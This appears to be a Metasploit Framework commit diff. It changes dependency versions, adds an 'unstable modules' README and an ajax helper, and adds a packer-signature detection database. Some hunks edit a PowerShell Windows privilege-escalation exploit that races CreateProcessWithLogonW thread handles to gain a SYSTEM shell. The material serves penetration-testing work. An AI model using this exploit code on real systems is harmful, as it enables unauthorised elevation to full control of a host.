Remove scrollout_loadlogs_exec for @bcoles

Move #6900 into unstable
Fix unstable branch
2017-04-21 21:24:06 -05:00 · 2016-07-20 15:17:32 -05:00 · 2016-07-20 15:12:45 -05:00 · 2016-07-20 13:10:17 -05:00 · 2016-05-25 19:32:55 -05:00 · 2016-05-25 04:07:09 -05:00
668 changed files with 52188 additions and 11276 deletions
@@ -46,7 +46,6 @@ and Metasploit's [Common Coding Mistakes].
 * **Do** include [console output], especially for witnessable effects in `msfconsole`.
 * **Do** list [verification steps] so your code is testable.
 * **Do** [reference associated issues] in your pull request description
-* **Do** write [release notes] once a pull request is landed
 * **Don't** leave your pull request description blank.
 * **Don't** abandon your pull request. Being responsive helps us land your code faster.

@@ -109,7 +108,6 @@ already way ahead of the curve, so keep it up!
 [console output]:https://help.github.com/articles/github-flavored-markdown#fenced-code-blocks
 [verification steps]:https://help.github.com/articles/writing-on-github#task-lists
 [reference associated issues]:https://github.com/blog/1506-closing-issues-via-pull-requests
-[release notes]:https://github.com/rapid7/metasploit-framework/wiki/Adding-Release-Notes-to-PRs
 [PR#2940]:https://github.com/rapid7/metasploit-framework/pull/2940
 [PR#3043]:https://github.com/rapid7/metasploit-framework/pull/3043
 [pre-commit hook]:https://github.com/rapid7/metasploit-framework/blob/master/tools/dev/pre-commit-hook.rb
@@ -1,7 +1,7 @@
 PATH
  remote: .
  specs:
-    metasploit-framework (4.12.26)
+    metasploit-framework (4.12.15)
      actionpack (~> 4.2.6)
      activerecord (~> 4.2.6)
      activesupport (~> 4.2.6)
@@ -16,15 +16,13 @@ PATH
      metasploit-model
      metasploit-payloads (= 1.1.13)
      metasploit_data_models
-      metasploit_payloads-mettle (= 0.0.6)
+      metasploit_payloads-mettle
      msgpack
-      nessus_rest
      net-ssh
      network_interface
      nokogiri
      octokit
      openssl-ccm
-      openvas-omp
      packetfu
      patch_finder
      pcaprub
@@ -33,55 +31,44 @@ PATH
      rb-readline-r7
      recog
      redcarpet
-      rex-arch
-      rex-bin_tools
-      rex-core
      rex-java
-      rex-mime
-      rex-nop
-      rex-ole
      rex-powershell
      rex-random_identifier
      rex-registry
-      rex-rop_builder
-      rex-socket
-      rex-sslscan
      rex-struct2
      rex-text
      rex-zip
      robots
-      rubyntlm
      rubyzip
      sqlite3
      sshkey
      tzinfo
      tzinfo-data
-      windows_error

 GEM
  remote: https://rubygems.org/
  specs:
-    actionpack (4.2.7.1)
-      actionview (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    actionpack (4.2.7)
+      actionview (= 4.2.7)
+      activesupport (= 4.2.7)
      rack (~> 1.6)
      rack-test (~> 0.6.2)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    actionview (4.2.7.1)
-      activesupport (= 4.2.7.1)
+    actionview (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
      erubis (~> 2.7.0)
      rails-dom-testing (~> 1.0, >= 1.0.5)
      rails-html-sanitizer (~> 1.0, >= 1.0.2)
-    activemodel (4.2.7.1)
-      activesupport (= 4.2.7.1)
+    activemodel (4.2.7)
+      activesupport (= 4.2.7)
      builder (~> 3.1)
-    activerecord (4.2.7.1)
-      activemodel (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    activerecord (4.2.7)
+      activemodel (= 4.2.7)
+      activesupport (= 4.2.7)
      arel (~> 6.0)
-    activesupport (4.2.7.1)
+    activesupport (4.2.7)
      i18n (~> 0.7)
      json (~> 1.7, >= 1.7.7)
      minitest (~> 5.1)
@@ -91,7 +78,7 @@ GEM
    arel (6.0.3)
    arel-helpers (2.3.0)
      activerecord (>= 3.1.0, < 6)
-    aruba (0.14.2)
+    aruba (0.14.1)
      childprocess (~> 0.5.6)
      contracts (~> 0.9)
      cucumber (>= 1.3.19)
@@ -101,7 +88,7 @@ GEM
    bcrypt (3.1.11)
    bit-struct (0.15.0)
    builder (3.2.2)
-    capybara (2.8.1)
+    capybara (2.7.1)
      addressable
      mime-types (>= 1.16)
      nokogiri (>= 1.3.3)
@@ -122,12 +109,12 @@ GEM
      multi_test (>= 0.1.2)
    cucumber-core (1.5.0)
      gherkin (~> 4.0)
-    cucumber-rails (1.4.4)
+    cucumber-rails (1.4.3)
      capybara (>= 1.1.2, < 3)
      cucumber (>= 1.3.8, < 3)
      mime-types (>= 1.16, < 4)
      nokogiri (~> 1.5)
-      railties (>= 3, < 5.1)
+      railties (>= 3, < 5)
    cucumber-wire (0.0.1)
    diff-lcs (1.2.5)
    docile (1.1.5)
@@ -177,7 +164,7 @@ GEM
      postgres_ext
      railties (~> 4.2.6)
      recog (~> 2.0)
-    metasploit_payloads-mettle (0.0.6)
+    metasploit_payloads-mettle (0.0.5)
    method_source (0.8.2)
    mime-types (3.1)
      mime-types-data (~> 3.2015)
@@ -188,7 +175,6 @@ GEM
    multi_json (1.12.1)
    multi_test (0.1.2)
    multipart-post (2.0.0)
-    nessus_rest (0.1.4)
    net-ssh (3.2.0)
    network_interface (0.0.1)
    nokogiri (1.6.8)
@@ -197,7 +183,6 @@ GEM
    octokit (4.3.0)
      sawyer (~> 0.7.0, >= 0.5.3)
    openssl-ccm (1.2.1)
-    openvas-omp (0.0.4)
    packetfu (1.1.11)
      network_interface (~> 0.0)
      pcaprub (~> 0.12)
@@ -225,54 +210,30 @@ GEM
      rails-deprecated_sanitizer (>= 1.0.1)
    rails-html-sanitizer (1.0.3)
      loofah (~> 2.0)
-    railties (4.2.7.1)
-      actionpack (= 4.2.7.1)
-      activesupport (= 4.2.7.1)
+    railties (4.2.7)
+      actionpack (= 4.2.7)
+      activesupport (= 4.2.7)
      rake (>= 0.8.7)
      thor (>= 0.18.1, < 2.0)
    rake (11.2.2)
    rb-readline-r7 (0.5.2.0)
-    recog (2.0.22)
+    recog (2.0.21)
      nokogiri
    redcarpet (3.3.4)
-    rex-arch (0.1.1)
-      rex-text
-    rex-bin_tools (0.1.0)
-      metasm
-      rex-arch
-      rex-core
-      rex-struct2
-      rex-text
-    rex-core (0.1.2)
    rex-java (0.1.2)
-    rex-mime (0.1.1)
-      rex-text
-    rex-nop (0.1.0)
-      rex-arch
-    rex-ole (0.1.2)
-      rex-text
-    rex-powershell (0.1.64)
+    rex-powershell (0.1.0)
      rex-random_identifier
      rex-text
    rex-random_identifier (0.1.0)
      rex-text
    rex-registry (0.1.0)
-    rex-rop_builder (0.1.0)
-      metasm
-      rex-core
-      rex-text
-    rex-socket (0.1.0)
-      rex-core
-    rex-sslscan (0.1.0)
-      rex-socket
-      rex-text
    rex-struct2 (0.1.0)
-    rex-text (0.2.1)
+    rex-text (0.1.1)
    rex-zip (0.1.0)
      rex-text
    rkelly-remix (0.0.6)
    robots (0.10.1)
-    rspec-core (3.5.3)
+    rspec-core (3.5.1)
      rspec-support (~> 3.5.0)
    rspec-expectations (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
@@ -280,7 +241,7 @@ GEM
    rspec-mocks (3.5.0)
      diff-lcs (>= 1.2.0, < 2.0)
      rspec-support (~> 3.5.0)
-    rspec-rails (3.5.2)
+    rspec-rails (3.5.1)
      actionpack (>= 3.0)
      activesupport (>= 3.0)
      railties (>= 3.0)
@@ -311,10 +272,9 @@ GEM
      thread_safe (~> 0.1)
    tzinfo-data (1.2016.6)
      tzinfo (>= 1.0.0)
-    windows_error (0.0.2)
    xpath (2.0.0)
      nokogiri (~> 1.3)
-    yard (0.9.5)
+    yard (0.9.0)

 PLATFORMS
  ruby
@@ -336,4 +296,4 @@ DEPENDENCIES
  yard

 BUNDLED WITH
-   1.13.1
+   1.12.5
@@ -0,0 +1,27 @@
+**This should never appear in Metasploit Framework's master branch!**
+
+The components under the unstable-* directories are unstable, in that
+they are untested, unverified, or otherwise incomplete. Many may be
+useful, but all require some level of work to get into the Metasploit
+master branch.
+
+In order to load the modules specifically, use:
+
+$ ./msfconsole -m unstable-modules/
+
+Unstable scripts and plugins may be referenced by full pathname
+normally.
+
+In order to help move these out of unstable and into the master
+branch, please fork the Metasploit framework project and send pull
+requests with your fixes back to the unstable branch. If you're
+reading this, you already probably have a GitHub account and are
+already familiar with the mechanics of forking and branching.
+Specifically, you probably know everything discussed on:
+
+https://github.com/rapid7/metasploit-framework/wiki
+
+Thanks for taking a look at these unstable modules!
+
+- Tod Beardsley, todb[at]metasploit[dot]com
+
@@ -155,8 +155,8 @@ Add-Type -TypeDefinition @"
        # CreateProcessWithLogonW --> lpCurrentDirectory
        $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName

-        $path1 = $env:windir
-        $path1 = "$path1\System32\cmd.exe"
+	$path1 = $env:windir
+    	$path1 = "$path1\System32\cmd.exe"
        # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
        $CallResult = [Advapi32]::CreateProcessWithLogonW(
            "user", "domain", "pass",
@@ -242,8 +242,8 @@ Add-Type -TypeDefinition @"
    $TidArray = @()

    echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
-    for ($i=0; $i -lt 1; $i++) {
+    # Loop Get-ThreadHandle and collect thread handles with a valid TID
+    for ($i=0; $i -lt 500; $i++) {
        $hThread = Get-ThreadHandle
        $hThreadID = [Kernel32]::GetThreadId($hThread)
        # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
@@ -309,19 +309,6 @@ Add-Type -TypeDefinition @"
            0x00000002, $cmd, $args1,
            0x00000004, $null, $GetCurrentPath,
            [ref]$StartupInfo, [ref]$ProcessInfo)
-
-    #---
-    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
-    #---
-    # Missing this check used to cause the exploit to fail sometimes.
-    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
-    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
-    # reliable now!
-    #---
-    if (!$CallResult) {
-        continue
-    }
-
        $hTokenHandle = [IntPtr]::Zero
        $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)

@@ -344,4 +331,4 @@ Add-Type -TypeDefinition @"
        $StartTokenRace.Stop()
        $SafeGuard.Stop()
    }
-    exit
+    exit
@@ -9,10 +9,25 @@ function ajax_download(oArg) {
    xmlHttp.overrideMimeType("text/plain; charset=x-user-defined");
  }

-  xmlHttp.open(oArg.method, oArg.path, false);
-  xmlHttp.send(oArg.data);
-  if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
-    return xmlHttp.responseText;
+  xmlHttp.open(oArg.method, oArg.path, !!oArg.cb);
+
+  if (oArg.cb) {
+    xmlHttp.onreadystatechange = function() {
+      if (xmlHttp.readyState == 4) { 
+        oArg.cb.apply(this);
+      }
+    };
+
+    xmlHttp.send(oArg.data);
  }
-  return null;
+  else {
+    xmlHttp.send(oArg.data);
+    if (xmlHttp.readyState == 4 && xmlHttp.status == 200) {
+      return xmlHttp.responseText;
+    }
+
+    return null;
+  }
+
+  return xmlHttp;
 }
@@ -0,0 +1,3043 @@
+[Name of the Packer v1.0]
+signature = 50 E8 ?? ?? ?? ?? 58 25 ?? F0 FF FF 8B C8 83 C1 60 51 83 C0 40 83 EA 06 52 FF 20 9D C3
+ep_only = true
+
+[Crypto-Lock v2.02 (Eng) -> Ryan Thian]
+signature = 60 BE ?? 90 40 00 8D BE ?? ?? FF FF 57 83 CD FF EB 10 90 90 90 90 90 90 8A 06 46 88 07 47 01 DB 75 07 8B 1E 83 EE FC 11 DB 72 ED B8 01 00 00 00 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C0 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 31 C9 83 E8 03 72 0D C1 E0 08 8A 06 46 83 F0 FF 74 74 89 C5 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 75 20 41 01 DB 75 07 8B 1E 83 EE FC 11 DB 11 C9 01 DB 73 EF 75 09 8B 1E 83 EE FC 11 DB 73 E4 83 C1 02 81 FD 00 F3 FF FF 83 D1 01 8D 14 2F 83 FD FC 76 0F 8A 02 42 88 07 47 49 75 F7 E9 63 FF FF FF 90 8B 02 83 C2 04 89 07 83 C7 04 83 E9 04 77 F1 01 CF E9 4C FF FF FF 5E 89 F7 B9 55 00 00 00 8A 07 47 2C E8 3C 01 77 F7 80 3F 01 75 F2 8B 07 8A 5F 04 66 C1 E8 08 C1 C0 10 86 C4 29 F8 80 EB E8 01 F0 89 07
+ep_only = true
+
+[Exact Audio Copy -> (UnknownCompiler)]
+signature = E8 ?? ?? ?? 00 31 ED 55 89 E5 81 EC ?? 00 00 00 8D BD ?? FF FF FF B9 ?? 00 00 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.00 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 FC B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 51 FF FF FF 5F BB 28 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1C ?? ?? 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> bart/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB 27 ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 07 74 EF FE 07 75 06 47 FF 37 AF EB 09 FE 07 0F 84 1A ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 1B ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.30 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 E8 0A 00 00 00 02 D2 75 05 8A 16 46 12 D2 C3 B2 80 A4 6A 02 5B FF 14 24 73 F7 33 C9 FF 14 24 73 18 33 C0 FF 14 24 73 21 B3 02 41 B0 10 FF 14 24 12 C0 73 F9 75 3F AA EB DC E8 43 00 00 00 2B CB 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 41 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B3 01 56 8B F7 2B F0 F3 A4 5E EB 96 33 C9 41 FF 54 24 04 13 C9 FF 54 24 04 72 F4 C3 5F 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 52 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 09 06 AD 75 DB 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[FSG v1.31 (Eng) -> dulek/xt]
+signature = BB D0 01 40 00 BF 00 10 40 00 BE ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80 A4 B6 80 FF D3 73 F9 33 C9 FF D3 73 16 33 C0 FF D3 73 23 B6 80 41 B0 10 FF D3 12 C0 73 FA 75 42 AA EB E0 E8 46 00 00 00 02 F6 83 D9 01 75 10 E8 38 00 00 00 EB 28 AC D1 E8 74 48 13 C9 EB 1C 91 48 C1 E0 08 AC E8 22 00 00 00 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 97 33 C9 41 FF D3 13 C9 FF D3 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 5B 5B 0F B7 3B 4F 74 08 4F 74 13 C1 E7 0C EB 07 8B 7B 02 57 83 C3 04 43 43 E9 58 FF FF FF 5F BB ?? ?? ?? 00 47 8B 37 AF 57 FF 13 95 33 C0 AE 75 FD FE 0F 74 EF FE 0F 75 06 47 FF 37 AF EB 09 FE 0F 0F 84 ?? ?? ?? FF 57 55 FF 53 04 89 06 AD 85 C0 75 D9 8B EC C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 88 01 00 00
+ep_only = true
+
+[FSG 1.31 -> dulek/xt]
+signature = BE ?? ?? ?? 00 BF ?? ?? ?? 00 BB ?? ?? ?? 00 53 BB ?? ?? ?? 00 B2 80
+ep_only = true
+
+[FSG v1.33 (Eng) -> dulek/xt]
+signature = BE A4 01 40 00 AD 93 AD 97 AD 56 96 B2 80 A4 B6 80 FF 13 73 F9 33 C9 FF 13 73 16 33 C0 FF 13 73 1F B6 80 41 B0 10 FF 13 12 C0 73 FA 75 3C AA EB E0 FF 53 08 02 F6 83 D9 01 75 0E FF 53 04 EB 26 AC D1 E8 74 2F 13 C9 EB 1A 91 48 C1 E0 08 AC FF 53 04 3D 00 7D 00 00 73 0A 80 FC 05 73 06 83 F8 7F 77 02 41 41 95 8B C5 B6 00 56 8B F7 2B F0 F3 A4 5E EB 9D 8B D6 5E AD 48 74 0A 79 02 AD 50 56 8B F2 97 EB 87 AD 93 5E 46 AD 97 56 FF 13 95 AC 84 C0 75 FB FE 0E 74 F0 79 05 46 AD 50 EB 09 FE 0E 0F 84 ?? ?? ?? FF 56 55 FF 53 04 AB EB E0 33 C9 41 FF 13 13 C9 FF 13 72 F8 C3 02 D2 75 05 8A 16 46 12 D2 C3 ?? ?? ?? 00 00 00 00 00 00 00 00 00 54 01 00 00 ?? ?? ?? 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 61 01 00 00 6F 01 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[NoodleCrypt v2.00 (Eng) -> NoodleSpa]
+signature = EB 01 9A E8 76 00 00 00 EB 01 9A E8 65 00 00 00 EB 01 9A E8 7D 00 00 00 EB 01 9A E8 55 00 00 00 EB 01 9A E8 43 04 00 00 EB 01 9A E8 E1 00 00 00 EB 01 9A E8 3D 00 00 00 EB 01 9A E8 EB 01 00 00 EB 01 9A E8 2C 04 00 00 EB 01 9A E8 25 00 00 00 EB 01 9A E8 02 04 00 00 EB 01 9A E8 19 07 00 00 EB 01 9A E8 9C 00 00 00 EB 01 9A E8 9C 06 00 00 E8 00 00 00 00 0F 7E F8 EB 01 9A 8B F8 C3 E8 00 00 00 00 58 EB 01 9A 25 00 F0 FF FF 8B F8 EB 01 9A 0F 6E F8 C3 8B D0 EB 01 9A 81 C2 C8 00 00 00 EB 01 9A B9 00 17 00 00 EB 01 9A C0 0A 06 EB 01 9A 80 2A 15 EB 01 9A 42 E2 EE 0F 6E C0 EB 01 9A 0F 7E C0 EB 01 9A 8B D0 00 85 EB A5 F5 65 4B 45 45 00 85 EB B3 65 07 45 45 00 85 EB 75 C7 C6 00 85 EB 65 CF 8A 00 85 EB D5 FD C0 00 85 EB 7F E5 05 05 05 00 85 EB 7F 61 06 45 45 00 85 EB 7F
+ep_only = true
+
+[PassLock 2000 v1.0 (Eng) -> Moonlight-Software]
+signature = 55 8B EC 53 56 57 BB 00 50 40 00 66 2E F7 05 34 20 40 00 04 00 0F 85 98 00 00 00 E8 1F 01 00 00 C7 43 60 01 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 83 EC 44 C7 04 24 44 00 00 00 C7 44 24 2C 00 00 00 00 54 FF 15 E8 61 40 00 B8 0A 00 00 00 F7 44 24 2C 01 00 00 00 74 05 0F B7 44 24 30 83 C4 44 89 43 56 FF 15 D0 61 40 00 E8 9E 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 6A 00 FF 15 E4 61 40 00 89 43 5C E8 F9 00 00 00 E8 AA 00 00 00 B8 FF 00 00 00 72 0D 53 E8 96 00 00 00 5B FF 4B 10 FF 4B 18 5F 5E 5B 5D 50 FF 15 C8 61 40 00 C3 83 7D 0C 01 75 3F E8 81 00 00 00 8D 83 E4 01 00 00 50 FF 15 F0 61 40 00 FF 15 D0 61 40 00 E8 3A 00 00 00 89 43 4C FF 15 D4 61 40 00 89 43 48 8B 45 08 89 43 5C E8 9A 00 00 00 E8 4B 00 00 00 72 11 66 FF 43 5A 8B 45 0C 89 43 60 53
+ep_only = true
+
+[PESpin v0.3 (Eng) -> cyberbob]
+signature = EB 01 68 60 E8 00 00 00 00 8B 1C 24 83 C3 12 81 2B E8 B1 06 00 FE 4B FD 82 2C 24 B7 CD 46 00 0B E4 74 9E 75 01 C7 81 73 04 D7 7A F7 2F 81 73 19 77 00 43 B7 F6 C3 6B B7 00 00 F9 FF E3 C9 C2 08 00 A3 68 72 01 FF 5D 33 C9 41 E2 17 EB 07 EA EB 01 EB EB 0D FF E8 01 00 00 00 EA 5A 83 EA 0B FF E2 8B 95 CB 2C 40 00 8B 42 3C 03 C2 89 85 D5 2C 40 00 41 C1 E1 07 8B 0C 01 03 CA 8B 59 10 03 DA 8B 1B 89 9D E9 2C 40 00 53 8F 85 B6 2B 40 00 BB ?? 00 00 00 B9 75 0A 00 00 8D BD 7E 2D 40 00 4F 30 1C 39 FE CB E2 F9 68 3C 01 00 00 59 8D BD B6 36 40 00 C0 0C 39 02 E2 FA E8 02 00 00 00 FF 15 5A 8D 85 1F 53 56 00 BB 54 13 0B 00 D1 E3 2B C3 FF E0 E8 01 00 00 00 68 E8 1A 00 00 00 8D 34 28 B9 08 00 00 00 B8 ?? ?? ?? ?? 2B C9 83 C9 15 0F A3 C8 0F 83 81 00 00 00 8D B4 0D DC 2C 40 00
+ep_only = true
+
+[PeX v0.99 (Eng) -> bart/CrackPl]
+signature = E9 F5 00 00 00 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 20 50 65 58 20 28 63 29 20 62 79 20 62 61 72 74 5E 43 72 61 63 6B 50 6C 20 62 65 74 61 20 72 65 6C 65 61 73 65 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0D 0A C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 C4 0D 0A 60 E8 01 00 00
+ep_only = true
+
+[Special EXE Pasword Protector v1.01 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 89 AD 8C 01 00 00 8B C5 2B 85 FE 75 00 00 89 85 3E 77 00 00 8D 95 C6 77 00 00 8D 8D FF 77 00 00 55 68 00 20 00 00 51 52 6A 00 FF 95 04 7A 00 00 5D 6A 00 FF 95 FC 79 00 00 8D 8D 60 78 00 00 8D 95 85 01 00 00 55 68 00 04 00 00 52 6A 00 51 50 FF 95 08 7A 00 00 5D 8D B5 3F 78 00 00 6A 00 6A 00 6A 00 56 FF 95 0C 7A 00 00 0B C0 0F 84 FE 00 00 00 56 FF 95 10 7A 00 00 56 FF 95 14 7A 00 00 80 BD 3E 78 00 00 00 74 D4 33 D2 8B BD 3E 77 00 00 8D 85 1D 02 00 00 89 85 42 77 00 00 8D 85 49 02 00 00 89 85 46 77 00 00 8D 85 EB 75 00 00 89 85 4A 77 00 00 8B 84 D5 24 76 00 00 03 F8 8B 8C D5 28 76 00 00 3B 85 36 77 00 00 60 74 1F 8D B5 BD 02 00 00 FF D6 85 D2 75 11 60 87 FE 8D BD 15 78 00 00 B9 08 00 00 00 F3 A5 61 EB 15 8D 85 9F 02 00
+ep_only = true
+
+[SVK Protector v1.32 (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 06 36 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[SVK Protector v1.3x (Eng) -> Pavol Cerven]
+signature = 60 E8 00 00 00 00 5D 81 ED 06 00 00 00 EB 05 B8 ?? ?? 42 00 64 A0 23 00 00 00 EB 03 C7 84 E8 84 C0 EB 03 C7 84 E9 75 67 B9 49 00 00 00 8D B5 C5 02 00 00 56 80 06 44 46 E2 FA 8B 8D C1 02 00 00 5E 55 51 6A 00 56 FF 95 0C 61 00 00 59 5D 40 85 C0 75 3C 80 3E 00 74 03 46 EB F8 46 E2 E3 8B C5 8B 4C 24 20 2B 85 BD 02 00 00 89 85 B9 02 00 00 80 BD B4 02 00 00 01 75 06 8B 8D 0C 61 00 00 89 8D B5 02 00 00 8D 85 0E 03 00 00 8B DD FF E0 55 68 10 10 00 00 8D 85 B4 00 00 00 50 8D 85 B4 01 00 00 50 6A 00 FF 95 18 61 00 00 5D 6A FF FF 95 10 61 00 00 44 65 62 75 67 67 65 72 20 6F 72 20 74 6F 6F 6C 20 66 6F 72 20 6D 6F 6E 69 74 6F 72 69 6E 67 20 64 65 74 65 63 74 65 64 21 21 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
+ep_only = true
+
+[Video-Lan-Client -> (UnknownCompiler)]
+signature = 55 89 E5 83 EC 08 ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? FF FF ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? 00 ?? ?? ?? ?? ?? ?? ?? 00
+ep_only = true
+
+[FSG v1.10 (Eng) -> dulek/xt -> (Microsoft Visual C++ 6.0)]
